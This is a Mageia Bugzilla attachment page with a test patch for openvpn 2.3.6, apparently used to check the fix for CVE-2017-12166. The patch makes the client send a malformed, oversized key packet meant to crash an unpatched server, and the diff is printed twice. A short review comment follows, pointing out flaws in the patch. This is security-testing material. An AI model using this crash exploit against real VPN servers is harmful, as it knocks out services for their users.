Mageia Bugzilla – Attachment 9733 Details for
Bug 21780
openvpn new security issue CVE-2017-12166
[patch]
Patch against openvpn 2.3.6 to exploit CVE-2017-12166
openvpn-2.3.6_exploit_test.patch (text/plain), 1.13 KB, created by
Josua Dietze
on 2017-10-16 22:50:24 CEST
Description:
Patch against openvpn 2.3.6 to exploit CVE-2017-12166
Filename:
MIME Type:
Creator:
Josua Dietze
Created:
2017-10-16 22:50:24 CEST
Size:
1.13 KB
>--- openvpn-2.3.6/src/openvpn/crypto.c.orig 2017-10-16 20:05:17.712131045 +0200
>+++ openvpn-2.3.6/src/openvpn/crypto.c 2017-10-16 20:15:36.758173788 +0200
>@@ -1233,15 +1233,28 @@ write_key (const struct key *key, const
> ASSERT (kt->cipher_length <= MAX_CIPHER_KEY_LENGTH
> && kt->hmac_length <= MAX_HMAC_KEY_LENGTH);
>
>- if (!buf_write (buf, &kt->cipher_length, 1))
>- return false;
>- if (!buf_write (buf, &kt->hmac_length, 1))
>+/* Create fake key packet to crash unpatched server */
>+
>+ uint8_t fake_len = 0x7f;
>+ uint8_t fake_data[0xff];
>+
>+ if (!buf_write(buf, &fake_len, 1))
> return false;
>- if (!buf_write (buf, key->cipher, kt->cipher_length))
>+ if (!buf_write(buf, &fake_len, 1))
> return false;
>- if (!buf_write (buf, key->hmac, kt->hmac_length))
>+ if (!buf_write(buf, fake_data, 0xff))
> return false;
>
>+
>+// if (!buf_write (buf, &kt->cipher_length, 1))
>+// return false;
>+// if (!buf_write (buf, &kt->hmac_length, 1))
>+// return false;
>+// if (!buf_write (buf, key->cipher, kt->cipher_length))
>+// return false;
>+// if (!buf_write (buf, key->hmac, kt->hmac_length))
>+// return false;
>+
> return true;
> }
>
--- openvpn-2.3.6/src/openvpn/crypto.c.orig 2017-10-16 20:05:17.712131045 +0200 +++ openvpn-2.3.6/src/openvpn/crypto.c 2017-10-16 20:15:36.758173788 +0200 @@ -1233,15 +1233,28 @@ write_key (const struct key *key, const ASSERT (kt->cipher_length <= MAX_CIPHER_KEY_LENGTH && kt->hmac_length <= MAX_HMAC_KEY_LENGTH); - if (!buf_write (buf, &kt->cipher_length, 1)) - return false; - if (!buf_write (buf, &kt->hmac_length, 1)) +/* Create fake key packet to crash unpatched server */ + + uint8_t fake_len = 0x7f; + uint8_t fake_data[0xff]; + + if (!buf_write(buf, &fake_len, 1)) return false; - if (!buf_write (buf, key->cipher, kt->cipher_length)) + if (!buf_write(buf, &fake_len, 1)) return false; - if (!buf_write (buf, key->hmac, kt->hmac_length)) + if (!buf_write(buf, fake_data, 0xff)) return false; + +// if (!buf_write (buf, &kt->cipher_length, 1)) +// return false; +// if (!buf_write (buf, &kt->hmac_length, 1)) +// return false; +// if (!buf_write (buf, key->cipher, kt->cipher_length)) +// return false; +// if (!buf_write (buf, key->hmac, kt->hmac_length)) +// return false; + return true; }
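Review bot: `fake_data` is declared without an initializer and all 0xff bytes are then handed to `buf_write`, so a build with this test patch sends indeterminate stack contents from the tester's own process to the peer; `uint8_t fake_data[0xff] = {0};` avoids disclosing local memory. The malformed write also replaces the normal key serialization unconditionally, so the retained `ASSERT` on `kt->cipher_length` and `kt->hmac_length` no longer bounds anything that is actually written, and every binary built from this tree is unusable as a regular peer. Wrapping the block in a test-only preprocessor guard and deleting the `//`-commented original, rather than keeping it as dead code, would make it harder for the change to leak into a packaged build. For verifying the fix, the relevant check is on the receiving side, which presumably has to apply the same `MAX_CIPHER_KEY_LENGTH` / `MAX_HMAC_KEY_LENGTH` bounds to the length bytes it reads; that code is not in this hunk. `write_key` begins outside the hunk.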
Attachments on
bug 21780
:
9716
| 9733